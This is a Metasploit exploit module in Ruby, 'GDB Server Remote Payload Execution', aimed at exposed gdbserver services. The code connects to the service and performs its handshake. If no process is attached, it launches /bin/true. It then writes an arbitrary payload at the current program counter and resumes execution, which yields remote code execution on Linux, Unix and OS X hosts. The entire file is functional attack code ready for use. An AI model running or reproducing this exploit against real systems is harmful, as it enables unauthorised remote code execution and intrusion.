##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Gdb
def initialize(info = {})
super(update_info(info,
'Name' => 'GDB Server Remote Payload Execution',
'Description' => %q{
This module attempts to execute an arbitrary payload on a loose gdbserver service.
},
'Author' => [ 'joev' ],
'Targets' => [
[ 'x86 (32-bit)', { 'Arch' => ARCH_X86 } ],
[ 'x86_64 (64-bit)', { 'Arch' => ARCH_X86_64 } ]
],
'References' =>
[
['URL', 'https://github.com/rapid7/metasploit-framework/pull/3691']
],
'DisclosureDate' => 'Aug 24 2014',
'Platform' => %w(linux unix osx),
'DefaultTarget' => 0,
'DefaultOptions' => {
'PrependFork' => true
}
))
register_options([
OptString.new('EXE_FILE', [
false,
"The exe to spawn when gdbserver is not attached to a process.",
'/bin/true'
])
], self.class)
end
def exploit
connect
print_status "Performing handshake with gdbserver..."
handshake
enable_extended_mode
begin
print_status "Stepping program to find PC..."
gdb_data = process_info
rescue BadAckError, BadResponseError
# gdbserver is running with the --multi flag and is not currently
# attached to any process. let's attach to /bin/true or something.
print_status "No process loaded, attempting to load /bin/true..."
run(datastore['EXE_FILE'])
gdb_data = process_info
end
gdb_pc, gdb_arch = gdb_data.values_at(:pc, :arch)
unless payload.arch.include? gdb_arch
fail_with(
Msf::Exploit::Failure::BadConfig,
"The payload architecture is incorrect: "+
"the payload is #{payload.arch.first}, but #{gdb_arch} was detected from gdb."
)
end
print_status "Writing payload at #{gdb_pc}..."
write(payload.encoded, gdb_pc)
print_status "Executing the payload..."
continue
handler
disconnect
end
end